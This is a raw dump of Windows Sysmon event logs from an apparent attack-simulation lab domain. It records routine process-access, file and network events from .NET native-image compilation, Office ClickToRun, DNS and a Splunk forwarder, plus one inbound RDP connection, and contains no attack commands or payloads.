14:58:32.505{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC18-607E-6A0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.482{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC18-607E-6A0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.482{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC18-607E-6A0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC18-607E-690E-00000000BB01}6052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.435{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC18-607E-690E-00000000BB01}6052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.435{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC18-607E-690E-00000000BB01}6052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.419{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-walMD5=96AE34062FD66D65B533D1E23C44FA06,SHA256=5683FF0317A66D89B715A0149512FCB091BB91E609D4794B53FFFEE7CDA5ADA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.419{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-shmMD5=4A573BD29AA59DBA515155AF3CDCD9EA,SHA256=E06C07B51B998B532703235ABA79C4FBB5C3FA188DE83514E3F389C7CF38810B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000080090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:32.376{A7A01FEF-EC17-607E-680E-00000000BB01}3712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e80-0\Microsoft.Office.Tools.Excel.dll2021-04-20 14:58:32.376 10341000x800000000000000080089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.309{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.308{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.308{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.304{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.304{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.304{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.304{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.985{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61282- 354300x800000000000000080081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.957{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57981- 354300x800000000000000080080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.957{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local61282- 23542300x800000000000000080079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.246{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B621262ABD9B8836C5FE852303792DD,SHA256=5F38DE88B1830BF3D8FD95C4E5BB321243EF8216F472E32030070B6938A552A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.246{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC40CFF47A543CC0DB8E33EC1E24FAD0,SHA256=B1CFE506B0512334F2C4B717A872F5564E5586FAD984C7FECF507199437127F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050552Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:32.982{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6C3B5A9BBBCE8B65C89FA7209EEE7C,SHA256=F5683F877055D3AAA36257450FAAE3255328217175D8C97984607156BC174380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050551Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:32.466{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4FFE6D87EC930B1C94A3DFAE2FB0822C,SHA256=47E478B64F2C3181E0B12D0A89251CF7BE045C8BE6140E5B56175A0EE14D2877,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050550Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:29.610{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52854-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050549Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:28.713{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52537-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000080162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.982{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC19-607E-6F0E-00000000BB01}6176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.966{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC19-607E-6F0E-00000000BB01}6176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.966{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC19-607E-6F0E-00000000BB01}6176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:33.935{A7A01FEF-EC19-607E-6E0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15a4-0\Microsoft.Office.Tools.Outlook.Implementation.dll2021-04-20 14:58:33.935 10341000x800000000000000080158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.779{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC19-607E-6E0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.779{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC19-607E-6E0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.779{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC19-607E-6E0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.732{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC19-607E-6D0E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.716{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC19-607E-6D0E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 